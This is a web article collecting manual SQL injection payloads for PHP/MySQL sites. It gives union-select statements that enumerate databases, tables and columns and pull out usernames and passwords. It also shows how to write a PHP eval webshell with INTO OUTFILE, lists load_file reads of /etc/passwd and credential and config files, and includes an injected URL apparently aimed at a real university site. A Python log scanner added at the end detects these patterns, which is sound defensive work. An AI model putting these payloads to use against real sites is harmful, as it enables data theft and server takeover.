PHP+MySQL manual injection statement collection (recommended)

  • 2020-03-31 16:46:14
  • OfStack

Find the number of fields (columns)

order by num /*


Match the fields

and 1=1 union select 1,2,3,4,5,...,N /*


Find which field positions are displayed

and 1=2 union select 1,2,3,4,5,...,N /*


Reveal database information with built-in functions

version(), database(), user()

Database information without having to guess the displayed field (does not work on some sites):

and 1=2 union all select version() /*

and 1=2 union all select database() /*

and 1=2 union all select user() /*

Operating system information:

and 1=2 union all select @@global.version_compile_os from mysql.user /*

Database privileges (114 is the ASCII code of 'r', i.e. testing whether the current user starts with "root"):

and ord(mid(user(),1,1))=114 /*

Enumerate databases (MySQL > 5.0)

MySQL 5+ has a built-in database, information_schema, that stores the structure information of every database and table on the server.

and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.schemata limit 0,1

Enumerate tables

and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.tables where TABLE_SCHEMA=database name (in hexadecimal) limit 0,1 (shows one record) --


Enumerate columns

and 1=2 union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.columns where TABLE_NAME=table name (in hexadecimal) limit 0,1


Extract the password

and 1=2 union select 1,2,3,username column,5,6,7,password column,8,9 from table name limit 0,1

Advanced usage (one displayed field shows two values at once):

union select 1,2,3,concat(username column,0x3c,password column),5,6,7,8,9 from table name limit 0,1

Write a webshell directly (requires root)

Conditions:

1. Know the physical path of the site.

2. Have sufficient privileges (test with select ... from mysql.user).

3. magic_quotes_gpc = OFF.

select '<?php eval($_POST[cmd]);?>' into outfile 'physical path'

and 1=2 union all select HEX (the hex-encoded file content) into outfile 'path'


Common paths for load_file():

1. replace(load_file(0x2f6574632f706173737764),0x3c,0x20)
2. replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
The two statements above are used to view the complete source of a PHP file: replacing "<" with a space stops the browser from rendering the returned code as HTML, which would otherwise hide it.
3. load_file(char(47)) can list the root directory on FreeBSD and SunOS.
4. /etc/httpd/conf/httpd.conf or /usr/local/apache/conf/httpd.conf: Linux Apache virtual host configuration file.
5. c:\Program Files\Apache Group\Apache\conf\httpd.conf or c:\Apache\conf\httpd.conf: Windows Apache configuration file.
6. c:/Resin-3.0.14/conf/resin.conf: Resin configuration of a JSP site.
7. c:/Resin/conf/resin.conf, /usr/local/resin/conf/resin.conf: JSP virtual host configuration on Linux.
8. d:\APACHE\Apache2\conf\httpd.conf
9. C:\Program Files\mysql\my.ini
10. ../themes/darkblue_orange/layout.inc.php: phpMyAdmin path disclosure.
11. c:\Windows\system32\inetsrv\metabase.xml: IIS virtual host configuration file.
12. /usr/local/resin-3.0.22/conf/resin.conf: Resin 3.0.22 configuration file.
13. /usr/local/resin-pro-3.0.22/conf/resin.conf: same as above.
14. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf: Apache virtual hosts.
15. /etc/sysconfig/iptables
16. /usr/local/app/php5/lib/php.ini: PHP settings.
17. /etc/my.cnf: MySQL configuration file.
18. /etc/redhat-release: Red Hat system version.
19. C:\mysql\data\mysql\user.MYD: the MySQL system user table, including passwords.
20. /etc/sysconfig/network-scripts/ifcfg-eth0: IP address.
21. /usr/local/app/php5/lib/php.ini: PHP (same as 16).
22. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf: virtual site settings (same as 14).
23. C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
24. c:\Windows\my.ini
25. c:\boot.ini

To read config.inc.php or config.php: replace(load_file(HEX of the path),char(60),char(32))

Note:

char(60) is "<"

char(32) is a space

Problems encountered during manual injection:

After injection, the page shows:

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

For example: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php? ID = 20 and 13% % % % 201 = 2% 20 union select 20, 201, the load_file (0 x433a5c626f6f742e696e69), 3, 4, the user % 20 ()

This is caused by a character set mismatch between the selected columns (the injected column and the original one use different collations).

Solution: wrap the parameter in unhex(hex(...)). The URL above becomes:

http://www.mse.tsinghua.edu.cn/mse/research/instrument.php? ID = 20 and 13% % % % 201 = 2% 20 union select 20 201, unhex (hex (the load_file (0 x433a5c626f6f742e696e69))), 3, 4, unhex (hex (user ())) % 20

You can then continue injecting.
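As an added defensive example (not part of the original article), the following Python scanner URL-decodes request targets from web-server access-log lines, looks for the union select / information_schema / load_file / into outfile / order by / ord(mid()) / unhex(hex()) patterns this page lists, and decodes MySQL 0x hex literals so an analyst can see which file path was requested. The log format, the client IPs and the log lines are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Indicators drawn from the techniques listed on this page.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "info_schema": re.compile(r"\binformation_schema\.", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "into_outfile": re.compile(r"\binto\s+outfile\b", re.I),
    "mysql_vars": re.compile(r"@@\w+|\b(version|database|user)\s*\(\s*\)", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "char_probe": re.compile(r"\bord\s*\(\s*mid\s*\(", re.I),
    "unhex_hex": re.compile(r"\bunhex\s*\(\s*hex\s*\(", re.I),
}
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})\b")
# Common-log-style line: client, ident, user, [time], "METHOD target proto", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def decode_hex_literals(text):
    """Turn MySQL 0x... literals (as used for load_file paths) into printable strings."""
    out = []
    for m in HEX_LITERAL.finditer(text):
        try:
            s = bytes.fromhex(m.group(1)).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # odd length or non-ASCII: not a readable path
        if s.isprintable():
            out.append(s)
    return out

def analyze_request(target):
    """Return indicator names and decoded hex literals found in a request target."""
    query = urlsplit(target).query
    decoded = unquote_plus(unquote_plus(query))   # payloads are often encoded twice
    stripped = re.sub(r"/\*.*?\*/", "", decoded)  # drop inline comments used as splitters
    normalized = re.sub(r"\s+", " ", stripped)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(normalized))
    return {"indicators": hits, "hex_strings": decode_hex_literals(normalized)}

def scan_log(lines):
    """Return (client_ip, status, analysis) for each line carrying at least one indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        result = analyze_request(target)
        if result["indicators"]:
            findings.append((ip, status, result))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [31/Mar/2020:16:46:14 +0000] "GET /instrument.php?ID=20%20and%201=2%20union%20select%201,load_file(0x2f6574632f706173737764),3,4,user() HTTP/1.1" 200 5120',
    '203.0.113.5 - - [31/Mar/2020:16:46:20 +0000] "GET /instrument.php?ID=20%20order%20by%2010/* HTTP/1.1" 500 311',
    '198.51.100.7 - - [31/Mar/2020:16:47:01 +0000] "GET /instrument.php?ID=20 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, status, res in scan_log(SAMPLE_LOG):
        print(ip, status, res["indicators"], res["hex_strings"])
```

The decoded hex strings are what make the alert actionable: a request that reads /etc/passwd or a configuration file from the list above should be treated as a successful file read if the response status is 200.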

